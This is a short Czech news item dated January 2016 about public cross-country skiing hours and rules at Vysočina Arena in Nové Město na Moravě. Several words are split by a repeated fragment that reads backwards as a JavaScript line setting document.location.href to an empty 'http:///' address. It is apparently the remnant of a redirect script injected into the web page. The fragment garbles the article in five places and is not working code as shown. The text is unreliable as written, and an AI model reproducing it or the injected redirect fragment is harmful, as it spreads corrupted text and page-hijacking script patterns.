Rainbow page separator

Lidé si v lednu mohou zalyžovat ve Vysočina Areně

Středa, 13. ledna 2016

Vysočina Aréna 2016

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Lyžování na závodních tratích ve Vysočina Areně bude v průběhu ledna umožněno veřejnosti. Ve všední dny si tam lidé mohou připnout běžky od pondělí do pátku v době od 12 do 14.30 hodin. Co se týče víkendů, pro amatérské lyžaře jsou tratě volné pouze v sobotu 30. a v neděli 31. ledna od 13 do 17 hodin. Využít je také možné večerní lyžování – vždy v úterý, ve středu a ve čtvrtek od 17 do 19 hodin.
Na tratě je zakázán vstup s lyžemi namazanými klistrem. Na stadion se je možné dostat výhradně přístupovým tunelem od buňkoviště, aby lyžaři technický sníh nezanášeli nečis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totami z bot.
Ve Vysočina Areně aktuálně funguje lyžařské tes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovací centrum, kde si mohou i amatérští lyžaři nechat otes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat své lyže, vázání a další vybavení. Zakoupit si je tam možné i občerstvení.

Zdroj fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: www.vysocina-arena.cz